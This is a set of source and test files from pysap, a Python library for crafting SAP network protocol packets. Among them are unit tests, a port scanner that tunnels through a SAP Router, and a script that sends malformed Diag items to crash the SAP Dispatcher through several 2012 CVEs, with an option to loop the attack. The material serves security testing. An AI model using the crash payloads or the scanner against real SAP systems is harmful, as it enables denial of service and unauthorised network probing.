            for menu in menudetails.entries:
                if verbose:
                    print "[*] Found child menu item: \"%s\", pos %d, %d, %d, %d" % (menu.text, menu.position_1, menu.position_2, menu.position_3, menu.position_4)
                login_frame.add_child_menu(menu.text, menu.position_1, menu.position_2, menu.position_3, menu.position_4, menu.flag_TERM_SEL, menu.flag_TERM_MEN, menu.flag_TERM_SEP)

    # Render the buttonbar
    if len(buttonbars) > 0:
        for button in buttonbars.entries:
            if verbose:
                print "[*] Found button item: \"%s\"" % button.text
            login_frame.add_button(button.text)

    # Render the toolbar
    if len(toolbars) > 0:
        for toolbar in toolbars.entries:
            if verbose:
                print "[*] Found toolbar item: \"%s\"" % toolbar.text
            login_frame.add_toolbar(toolbar.text)

    login_frame.Show(True)
    app.MainLoop()


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Create the connection to the SAP Netweaver server
    print "[*] Connecting to", options.remote_host, "port", options.remote_port
    connection = SAPDiagConnection(options.remote_host,
                                   options.remote_port,
                                   terminal=options.terminal,
                                   route=options.route_string)

    # Send the initialization packet and store the response (login screen)
    login_screen = connection.init()

    print "[*] Login screen grabbed, rendering it"
    render_diag_screen(login_screen[SAPDiag], options.verbose)

    # Close the connection
    connection.close()


if __name__ == "__main__":
    main()



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import unittest
# Custom imports
from tests import sapni_test
from tests import sapdiag_test
from tests import saprouter_test
from tests import pysapcompress_test


def suite():
    suite = unittest.TestSuite()
    suite.addTests(sapni_test.suite())
    suite.addTests(sapdiag_test.suite())
    suite.addTests(saprouter_test.suite())
    suite.addTests(pysapcompress_test.suite())
    return suite


if __name__ == '__main__':
    unittest.TextTestRunner(verbosity=2).run(suite())



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import socket
import unittest
from threading import Thread
from struct import pack, unpack
from SocketServer import BaseRequestHandler, ThreadingTCPServer
# External imports
from scapy.fields import StrField
from scapy.packet import Packet, Raw
# Custom imports
from pysap.SAPNI import (SAPNI, SAPNIStreamSocket, SAPNIServerThreaded,
                         SAPNIServerHandler, SAPNIProxy, SAPNIProxyHandler)


class PySAPNITest(unittest.TestCase):

    test_string = "LALA" * 10

    def test_sapni_building(self):
        """Test SAPNI length field building"""
        sapni = SAPNI() / self.test_string

        (sapni_length, ) = unpack("!I", str(sapni)[:4])
        self.assertEqual(sapni_length, len(self.test_string))
        self.assertEqual(sapni.payload.load, self.test_string)

    def test_sapni_dissection(self):
        """Test SAPNI length field dissection"""

        data = pack("!I", len(self.test_string)) + self.test_string
        sapni = SAPNI(data)
        sapni.decode_payload_as(Raw)

        self.assertEqual(sapni.length, len(self.test_string))
        self.assertEqual(sapni.payload.load, self.test_string)


class SAPNITestHandler(BaseRequestHandler):
    """Basic SAP NI echo server implemented using TCPServer"""

    def handle(self):
        data = self.request.recv(4)
        (length, ) = unpack("!I", data)
        data = self.request.recv(length)

        response_length = pack("!I", len(data))
        self.request.sendall(response_length + data)


class SAPNITestHandlerKeepAlive(SAPNITestHandler):
    """Basic SAP NI keep alive server"""

    def handle(self):
        self.request.sendall("\x00\x00\x00\x08NI_PING\x00")
        SAPNITestHandler.handle(self)


class SAPNITestHandlerClose(SAPNITestHandler):
    """Basic SAP NI server that closes the connection"""

    def handle(self):
        self.request.send("")


class PySAPNIStreamSocketTest(unittest.TestCase):

    test_port = 8005
    test_address = "127.0.0.1"
    test_string = "TEST" * 10

    def start_server(self, handler_cls):
        self.server = ThreadingTCPServer((self.test_address, self.test_port),
                                         handler_cls,
                                         bind_and_activate=False)
        self.server.allow_reuse_address = True
        self.server.server_bind()
        self.server.server_activate()
        self.server_thread = Thread(target=self.server.serve_forever)
        self.server_thread.start()

    def stop_server(self):
        self.server.shutdown()
        self.server.server_close()
        self.server_thread.join()

    def test_sapnistreamsocket(self):
        """Test SAPNIStreamSocket"""
        self.start_server(SAPNITestHandler)

        sock = socket.socket()
        sock.connect((self.test_address, self.test_port))

        self.client = SAPNIStreamSocket(sock)
        packet = self.client.sr(self.test_string)
        packet.decode_payload_as(Raw)
        self.client.close()

        self.assertIn(SAPNI, packet)
        self.assertEqual(packet[SAPNI].length, len(self.test_string))
        self.assertEqual(packet.payload.load, self.test_string)

        self.stop_server()

    def test_sapnistreamsocket_base_cls(self):
        """Test SAPNIStreamSocket handling of custom base packet classes"""
        self.start_server(SAPNITestHandler)

        class SomeClass(Packet):
            fields_desc = [StrField("text", None)]

        sock = socket.socket()
        sock.connect((self.test_address, self.test_port))

        self.client = SAPNIStreamSocket(sock, base_cls=SomeClass)
        packet = self.client.sr(self.test_string)
        self.client.close()

        self.assertIn(SAPNI, packet)
        self.assertIn(SomeClass, packet)
        self.assertEqual(packet[SAPNI].length, len(self.test_string))
        self.assertEqual(packet[SomeClass].text, self.test_string)

        self.stop_server()

    def test_sapnistreamsocket_getnisocket(self):
        """Test SAPNIStreamSocket get nisocket class method"""
        self.start_server(SAPNITestHandler)

        self.client = SAPNIStreamSocket.get_nisocket(self.test_address,
                                                     self.test_port)

        packet = self.client.sr(self.test_string)
        packet.decode_payload_as(Raw)
        self.client.close()

        self.assertIn(SAPNI, packet)
        self.assertEqual(packet[SAPNI].length, len(self.test_string))
        self.assertEqual(packet.payload.load, self.test_string)

        self.stop_server()

    def test_sapnistreamsocket_without_keep_alive(self):
        """Test SAPNIStreamSocket without keep alive"""
        self.start_server(SAPNITestHandlerKeepAlive)

        sock = socket.socket()
        sock.connect((self.test_address, self.test_port))

        self.client = SAPNIStreamSocket(sock, keep_alive=False)
        packet = self.client.sr(self.test_string)
        packet.decode_payload_as(Raw)
        self.client.close()

        # We should receive a PING instead of our packet
        self.assertIn(SAPNI, packet)
        self.assertEqual(packet[SAPNI].length, len(SAPNI.SAPNI_PING))
        self.assertEqual(packet.payload.load, SAPNI.SAPNI_PING)

        self.stop_server()

    def test_sapnistreamsocket_with_keep_alive(self):
        """Test SAPNIStreamSocket with keep alive"""
        self.start_server(SAPNITestHandlerKeepAlive)

        sock = socket.socket()
        sock.connect((self.test_address, self.test_port))

        self.client = SAPNIStreamSocket(sock, keep_alive=True)
        packet = self.client.sr(self.test_string)
        packet.decode_payload_as(Raw)
        self.client.close()

        # We should receive our packet, the PING should be handled by the
        # stream socket
        self.assertIn(SAPNI, packet)
        self.assertEqual(packet[SAPNI].length, len(self.test_string))
        self.assertEqual(packet.payload.load, self.test_string)

        self.stop_server()

    def test_sapnistreamsocket_close(self):
        """Test SAPNIStreamSocket with a server that closes the connection"""
        self.start_server(SAPNITestHandlerClose)

        sock = socket.socket()
        sock.connect((self.test_address, self.test_port))

        self.client = SAPNIStreamSocket(sock, keep_alive=False)

        with self.assertRaises(socket.error):
            self.client.sr(self.test_string)

        self.stop_server()


class SAPNIServerTestHandler(SAPNIServerHandler):
    """Basic SAP NI echo server implemented using SAPNIServer"""

    def handle_data(self):
        self.request.send(self.packet)


class PySAPNIServerTest(unittest.TestCase):

    test_port = 8005
    test_address = "127.0.0.1"
    test_string = "TEST" * 10
    handler_cls = SAPNIServerTestHandler

    def setUp(self):
        self.server = SAPNIServerThreaded((self.test_address, self.test_port),
                                          self.handler_cls,
                                          bind_and_activate=False)
        self.server.allow_reuse_address = True
        self.server.server_bind()
        self.server.server_activate()
        self.server_thread = Thread(target=self.server.serve_forever)
        self.server_thread.start()

    def tearDown(self):
        self.server.shutdown()
        self.server.server_close()

    def test_sapniserver(self):
        """Test SAPNIServer"""
        sock = socket.socket()
        sock.connect((self.test_address, self.test_port))
        sock.sendall(pack("!I", len(self.test_string)) + self.test_string)

        response = sock.recv(1024)

        self.assertEqual(len(response), len(self.test_string) + 8)
        self.assertEqual(unpack("!I", response[:4]), (len(self.test_string) + 4, ))
        self.assertEqual(unpack("!I", response[4:8]), (len(self.test_string), ))
        self.assertEqual(response[8:], self.test_string)

        sock.close()


class PySAPNIProxyTest(unittest.TestCase):

    test_proxyport = 8005
    test_serverport = 8006
    test_address = "127.0.0.1"
    test_string = "TEST" * 10
    proxyhandler_cls = SAPNIProxyHandler
    serverhandler_cls = SAPNIServerTestHandler

    def setUp(self):
        self.server = SAPNIServerThreaded((self.test_address, self.test_serverport),
                                          self.serverhandler_cls,
                                          bind_and_activate=False)
        self.server.allow_reuse_address = True
        self.server.server_bind()
        self.server.server_activate()
        self.server_thread = Thread(target=self.server.serve_forever)
        self.server_thread.start()

    def tearDown(self):
        self.server.shutdown()
        self.server.server_close()

    def start_sapniproxy(self, handler_cls):
        self.proxy = SAPNIProxy(self.test_address, self.test_proxyport,
                                self.test_address, self.test_serverport,
                                handler=handler_cls)
        self.proxy_thread = Thread(target=self.handle_sapniproxy)
        self.proxy_thread.start()

    def handle_sapniproxy(self):
        self.proxy.handle_connection()

    def stop_sapniproxy(self):
        self.proxy.stop()

    def test_sapniproxy(self):
        self.start_sapniproxy(self.proxyhandler_cls)

        sock = socket.socket()
        sock.connect((self.test_address, self.test_proxyport))
        sock.sendall(pack("!I", len(self.test_string)) + self.test_string)

        response = sock.recv(1024)

        self.assertEqual(len(response), len(self.test_string) + 8)
        self.assertEqual(unpack("!I", response[:4]), (len(self.test_string) + 4, ))
        self.assertEqual(unpack("!I", response[4:8]), (len(self.test_string), ))
        self.assertEqual(response[8:], self.test_string)

        sock.close()
        self.stop_sapniproxy()

    def test_sapniproxy_process(self):

        class SAPNIProxyHandlerTest(SAPNIProxyHandler):

            def process_client(self, packet):
                return packet / Raw("Client")

            def process_server(self, packet):
                return packet / Raw("Server")

        self.start_sapniproxy(SAPNIProxyHandlerTest)

        sock = socket.socket()
        sock.connect((self.test_address, self.test_proxyport))
        sock.sendall(pack("!I", len(self.test_string)) + self.test_string)

        response = sock.recv(1024)

        expected_reponse = self.test_string + "Client" + "Server"
        self.assertEqual(len(response), len(expected_reponse) + 8)
        self.assertEqual(unpack("!I", response[:4]), (len(expected_reponse) + 4, ))
        self.assertEqual(unpack("!I", response[4:8]), (len(self.test_string) + 6, ))
        self.assertEqual(response[8:], expected_reponse)

        sock.close()
        self.stop_sapniproxy()


def suite():
    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    suite.addTest(loader.loadTestsFromTestCase(PySAPNITest))
    suite.addTest(loader.loadTestsFromTestCase(PySAPNIStreamSocketTest))
    suite.addTest(loader.loadTestsFromTestCase(PySAPNIServerTest))
    suite.addTest(loader.loadTestsFromTestCase(PySAPNIProxyTest))
    return suite


if __name__ == "__main__":
    unittest.TextTestRunner(verbosity=2).run(suite())



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNIStreamSocket, SAPNI
from pysap.SAPRouter import (SAPRouterRouteHop, get_router_version,
                             SAPRoutedStreamSocket, SAPRouteException,
                             SAPRouter)
# Optional imports
try:
    import netaddr
except ImportError:
    print("[-] netaddr library not found, running without network range parsing support")
    netaddr = None


# Bind the SAPRouter layer
bind_layers(SAPNI, SAPRouter, )

# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = \
    """This example script performs a port scanning through a SAP Router
    service.

    Similar to Bizploit's 'saprouterSpy', for more information check:
    * http://blog.onapsis.com/assessing-a-saprouters-security-with-onapsis-bizploit-part-i/
    * http://blog.onapsis.com/assessing-a-saprouters-security-with-onapsis-bizploit-part-ii/
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host [%default]", default="127.0.0.1")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3299)
    target.add_option("-t", "--target-hosts", dest="target_hosts", help="Target hosts to scan")
    target.add_option("-r", "--target-ports", dest="target_ports", help="Target ports to scan")
    target.add_option("--router-version", dest="router_version", type="int", help="SAP Router version to use [retrieve from the remote SAP Router]")
    target.add_option("--talk-mode", dest="talk_mode", help="Talk mode to use when requesting the route (raw or ni) [%default]", default="raw")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")
    if not options.target_hosts:
        parser.error("Target hosts to scan are required")
    if not options.target_ports:
        parser.error("Target ports to scan are required")
    options.talk_mode = options.talk_mode.lower()
    if options.talk_mode not in ["raw", "ni"]:
        parser.error("Invalid talk mode")

    return options


def parse_target_hosts(target_hosts, target_ports):
    for port in target_ports.split(','):
        for host in target_hosts.split(','):
            if netaddr:
                if netaddr.valid_nmap_range(host):
                    for ip in netaddr.iter_nmap_range(host):
                        yield (ip, port)
                else:
                    for ip in netaddr.iter_unique_ips(host):
                        yield (ip, port)
            else:
                yield(host, port)


def route_test(rhost, rport, thost, tport, talk_mode, router_version):

    print("[*] Routing connections to %s:%s" % (thost, tport))

    # Build the route to the target host passing through the SAP Router
    route = [SAPRouterRouteHop(hostname=rhost,
                               port=rport),
             SAPRouterRouteHop(hostname=thost,
                               port=tport)]

    # Try to connect to the target host using the routed stream socket
    try:
        conn = SAPRoutedStreamSocket.get_nisocket(route=route,
                                                  talk_mode=talk_mode,
                                                  router_version=router_version)
        conn.close()
        status = 'open'

    # If an SAPRouteException is raised, the route was denied or an error
    # occurred with the SAP router
    except SAPRouteException:
        status = 'denied'

    # Another error occurred on the server (e.g. timeout), mark the target as error
    except Exception:
        status = 'error'

    return status


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Connecting to SAP Router %s:%d (talk mode %s)" % (options.remote_host,
                                                                 options.remote_port,
                                                                 options.talk_mode))

    # Retrieve the router version used by the server if not specified
    if options.router_version is None:
        conn = SAPNIStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              keep_alive=False)
        options.router_version = get_router_version(conn)
        conn.close()
    print("[*] Using SAP Router version %d" % options.router_version)

    options.talk_mode = {"raw": 1,
                         "ni": 0}[options.talk_mode]

    results = []
    for (host, port) in parse_target_hosts(options.target_hosts, options.target_ports):
        status = route_test(options.remote_host, options.remote_port, host, port,
                            options.talk_mode, options.router_version)
        if options.verbose:
            print("[*] Status of %s:%s: %s" % (host, port, status))
        if status == "open":
            results.append((host, port))

    print("[*] Host/Ports found open:")
    for (host, port) in results:
        print("\tHost: %s\tPort:%s" % (host, port))


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from time import sleep
from socket import error as SocketError
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNI
from pysap.SAPDiagClient import SAPDiagConnection
from pysap.SAPDiag import SAPDiag, SAPDiagDP, SAPDiagItem


# Bind the SAPDiag layer
bind_layers(SAPNI, SAPDiag,)
bind_layers(SAPNI, SAPDiagDP,)
bind_layers(SAPDiagDP, SAPDiag,)
bind_layers(SAPDiag, SAPDiagItem,)
bind_layers(SAPDiagItem, SAPDiagItem,)


# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = \
    """This example script can be used to tests against Denial of Service vulnerabilities affecting the Dispatcher service. Currently 5 different vulnerabilities can be triggered.
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3200)
    target.add_option("--route-string", dest="route_string", help="Route string for connecting through a SAP Router")
    target.add_option("-c", "--cve", dest="cve", type="int", help="Number of CVE to trigger (1-6) [%default]", default=5)
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-l", "--loop", dest="loop", action="store_true", help="Loop until the user cancel (Ctrl+C) [%default]", default=False)
    misc.add_option("-n", "--number", dest="number", type="int", help="Number of packets to send each round (work processes to get down) [%default]", default=1)
    misc.add_option("-t", "--time", dest="delay", type="int", help="Time to wait between each round [%default]", default=5)
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    misc.add_option("--terminal", dest="terminal", default=None, help="Terminal name")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")
    if options.cve > 6:
        parser.error("Invalid CVE")

    return options


def send_crash(host, port, item, number, verbose, terminal=None, route=None):
    for i in range(number):
        # Create the connection to the SAP Netweaver server
        try:
            if verbose:
                print("[*] Sending crash #%d" % (i + 1))
            connection = SAPDiagConnection(host, port, init=True, terminal=terminal, route=route)
            connection.send_message([item])
        except SocketError:
            if verbose:
                print("[*] Connection error")


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Testing Dispatcher DoS vulnerabilities on host %s:%d" % (options.remote_host,
                                                                        options.remote_port))

    # Crafting the item according to the CVE selected
    if options.cve == 1:
        print("[*] Crash in DiagTraceHex (CVE-2012-2612) using a DataStream (Diag XML Blob) (requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="DIAG_XMLBLOB", item_length=0xFFFFFFFF, item_value="Crash!")
    elif options.cve == 2:
        print("[*] Crash in DiagTraceHex (CVE-2012-2612) using a variable ST_USER ST_USER_PASSPORT_DATA item (requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="APPL4", item_id="ST_USER", item_sid=0x18, item_length=0xFFFFFFFF, item_value="Crash!")
    elif options.cve == 3:
        print("[*] Crash in DiagTraceAtoms (CVE-2012-2511) using a DYNT ATOM item (requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="APPL4", item_id="DYNT", item_sid=0x02, item_value="\x80" * 8)
    elif options.cve == 4:
        print("[*] Crash in DiagTraceStreamI (CVE-2012-2512) using a RCUI RCUI_CONNECT_DATA item (requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="APPL", item_id="RCUI", item_sid=0x09, item_length=0xFF, item_value="\x12\x1A\x59\x51")
    elif options.cve == 5:
        print("[*] Crash in diaginput (CVE-2012-2513) using a VARINFO MAINAREA_PIXELSIZE item")
        item = SAPDiagItem(item_type="APPL", item_id="VARINFO", item_sid=0x0e, item_value="A" * 10)
    elif options.cve == 6:
        print("[*] Crash in DiagiEventSource (CVE-2012-2514) using a UI_EVENT UI_EVENT_SOURCE item")
        item = SAPDiagItem(item_type="APPL", item_id="UI_EVENT", item_sid=0x01, item_value="A" * 16)

    if options.loop:
        try:
            while True:
                if options.verbose:
                    print("[*] Started a new round")
                send_crash(options.remote_host, options.remote_port, item,
                           options.number, options.verbose, options.terminal,
                           options.route_string)
                sleep(options.delay)
        except KeyboardInterrupt:
            print("[*] Cancelled by the user")
    else:
        print("[*] Selected a single round")
        send_crash(options.remote_host, options.remote_port, item,
                   options.number, options.verbose, options.terminal,
                   options.route_string)
        print("[*] Crash sent, take a look at the work processes !")


if __name__ == "__main__":
    main()



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import socket
import unittest
from struct import unpack
from threading import Thread
# External imports

# Custom imports
from pysap.SAPNI import SAPNIServerHandler, SAPNIServerThreaded, SAPNI
from pysap.SAPRouter import (SAPRouter, SAPRouterRouteHop, router_is_route,
                             SAPRoutedStreamSocket, SAPRouteException)


class PySAPRouterTest(unittest.TestCase):

    def check_route(self, route_string, route_hops):
        """Check from string to hops and back again"""
        hops = SAPRouterRouteHop.from_string(route_string)
        self.assertListEqual(hops, route_hops)

        string = SAPRouterRouteHop.from_hops(hops)
        self.assertEqual(string, route_string)

    def test_saprouter_route_string(self):
        """Test construction of SAPRouterRouteHop items"""

        # Two hops with full details
        self.check_route("/H/host1/S/service1/W/pass1/H/host2/S/service2/W/pass2",
                         [SAPRouterRouteHop(hostname="host1",
                                            port="service1",
                                            password="pass1"),
                          SAPRouterRouteHop(hostname="host2",
                                            port="service2",
                                            password="pass2")])

        # One intermediate hop with service/password
        self.check_route("/H/host1/H/host2/S/service2/W/pass2/H/host3",
                         [SAPRouterRouteHop(hostname="host1"),
                          SAPRouterRouteHop(hostname="host2",
                                            port="service2",
                                            password="pass2"),
                          SAPRouterRouteHop(hostname="host3")])

        # Example in SAP Help
        self.check_route("/H/sap_rout/H/your_rout/W/pass_to_app/H/yourapp/S/sapsrv",
                         [SAPRouterRouteHop(hostname="sap_rout"),
                          SAPRouterRouteHop(hostname="your_rout",
                                            password="pass_to_app"),
                          SAPRouterRouteHop(hostname="yourapp",
                                            port="sapsrv")])

        # Hostname with FQDN
        self.check_route("/H/some.valid.domain.com/S/3299",
                         [SAPRouterRouteHop(hostname="some.valid.domain.com",
                                            port="3299")])

        # Hostname with IP addresses
        self.check_route("/H/127.0.0.1/S/3299",
                         [SAPRouterRouteHop(hostname="127.0.0.1",
                                            port="3299")])

        # Invalid route strings
        self.assertListEqual(SAPRouterRouteHop.from_string("/S/service"), [])
        self.assertListEqual(SAPRouterRouteHop.from_string("/P/password"), [])


class SAPRouterServerTestHandler(SAPNIServerHandler):
    """Basic SAP Router server that accepts a specific route and then
    acts as an echo server."""

    def __init__(self, request, client_address, server):
        self.routed = False
        SAPNIServerHandler.__init__(self, request, client_address, server)

    def handle_data(self):
        if self.routed:
            self.request.send(self.packet)
            return

        self.packet.decode_payload_as(SAPRouter)
        route_request = self.packet[SAPRouter]

        if router_is_route(route_request):
            if route_request.route_string[1].hostname == "10.0.0.1" and \
               route_request.route_string[1].port == "3200":
                self.routed = True
                self.request.send(SAPRouter(type=SAPRouter.SAPROUTER_PONG))
            else:
                self.request.send(SAPRouter(type=SAPRouter.SAPROUTER_ERROR,
                                            return_code=-94))
        else:
            self.request.send(SAPRouter(type=SAPRouter.SAPROUTER_ERROR))


class PySAPRoutedStreamSocketTest(unittest.TestCase):

    test_port = 8005
    test_address = "127.0.0.1"
    test_string = "TEST" * 10

    def start_server(self, handler_cls):
        self.server = SAPNIServerThreaded((self.test_address, self.test_port),
                                          handler_cls,
                                          bind_and_activate=False)
        self.server.allow_reuse_address = True
        self.server.server_bind()
        self.server.server_activate()
        self.server_thread = Thread(target=self.server.serve_forever)
        self.server_thread.start()

    def stop_server(self):
        self.server.shutdown()
        self.server.server_close()
        self.server_thread.join()

    def test_saproutedstreamsocket(self):
        """Test SAPRoutedStreamSocket"""
        self.start_server(SAPRouterServerTestHandler)

        sock = socket.socket()
        sock.connect((self.test_address, self.test_port))

        route = [SAPRouterRouteHop(hostname=self.test_address,
                                   port=self.test_port),
                 SAPRouterRouteHop(hostname="10.0.0.1",
                                   port="3200")]

        self.client = SAPRoutedStreamSocket(sock, route=route,
                                            router_version=40)
        packet = self.client.sr(self.test_string)

        self.assertIn(SAPNI, packet)
        self.assertEqual(packet[SAPNI].length, len(self.test_string) + 4)
        self.assertEqual(unpack("!I", packet[SAPNI].payload.load[:4]), (len(self.test_string), ))
        self.assertEqual(packet[SAPNI].payload.load[4:], self.test_string)

        self.client.close()
        self.stop_server()

    def test_saproutedstreamsocket_route_error(self):
        """Test SAPRoutedStreamSocket throwing of SAPRouteException if
        a route denied return error is received"""
        self.start_server(SAPRouterServerTestHandler)

        sock = socket.socket()
        sock.connect((self.test_address, self.test_port))

        route = [SAPRouterRouteHop(hostname=self.test_address,
                                   port=self.test_port),
                 SAPRouterRouteHop(hostname="10.0.0.2",
                                   port="3200")]

        with self.assertRaises(SAPRouteException):
            self.client = SAPRoutedStreamSocket(sock, route=route,
                                                router_version=40)

        self.stop_server()

    def test_saproutedstreamsocket_error(self):
        """Test SAPRoutedStreamSocket throwing of Exception if an invalid
        or unexpected packet is received"""
        self.start_server(SAPRouterServerTestHandler)

        sock = socket.socket()
        sock.connect((self.test_address, self.test_port))

        with self.assertRaises(Exception):
            self.client = SAPRoutedStreamSocket(sock, route=None,
                                                router_version=40)

        self.stop_server()

    def test_saproutedstreamsocket_getnisocket(self):
        """Test SAPRoutedStreamSocket get nisocket class method"""
        self.start_server(SAPRouterServerTestHandler)

        # Test using a complete route
        route = [SAPRouterRouteHop(hostname=self.test_address,
                                   port=self.test_port),
                 SAPRouterRouteHop(hostname="10.0.0.1",
                                   port="3200")]
        self.client = SAPRoutedStreamSocket.get_nisocket(route=route,
                                                         router_version=40)

        packet = self.client.sr(self.test_string)
        self.assertIn(SAPNI, packet)
        self.assertEqual(packet[SAPNI].length, len(self.test_string) + 4)
        self.assertEqual(unpack("!I", packet[SAPNI].payload.load[:4]), (len(self.test_string), ))
        self.assertEqual(packet[SAPNI].payload.load[4:], self.test_string)

        # Test using a route and a target host/port
        route = [SAPRouterRouteHop(hostname=self.test_address,
                                   port=self.test_port)]
        self.client = SAPRoutedStreamSocket.get_nisocket("10.0.0.1",
                                                         "3200",
                                                         route=route,
                                                         router_version=40)

        packet = self.client.sr(self.test_string)
        self.assertIn(SAPNI, packet)
        self.assertEqual(packet[SAPNI].length, len(self.test_string) + 4)
        self.assertEqual(unpack("!I", packet[SAPNI].payload.load[:4]), (len(self.test_string), ))
        self.assertEqual(packet[SAPNI].payload.load[4:], self.test_string)

        # Test using a route string
        route = "/H/%s/S/%s/H/10.0.0.1/S/3200" % (self.test_address,
                                                  self.test_port)
        self.client = SAPRoutedStreamSocket.get_nisocket(route=route,
                                                         router_version=40)

        packet = self.client.sr(self.test_string)
        self.assertIn(SAPNI, packet)
        self.assertEqual(packet[SAPNI].length, len(self.test_string) + 4)
        self.assertEqual(unpack("!I", packet[SAPNI].payload.load[:4]), (len(self.test_string), ))
        self.assertEqual(packet[SAPNI].payload.load[4:], self.test_string)

        self.client.close()
        self.stop_server()


def suite():
    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    suite.addTest(loader.loadTestsFromTestCase(PySAPRouterTest))
    suite.addTest(loader.loadTestsFromTestCase(PySAPRoutedStreamSocketTest))
    return suite


if __name__ == "__main__":
    unittest.TextTestRunner(verbosity=2).run(suite())



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import sys
import logging
from select import select
from struct import unpack
from threading import Event
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
# External imports
from scapy.fields import LenField
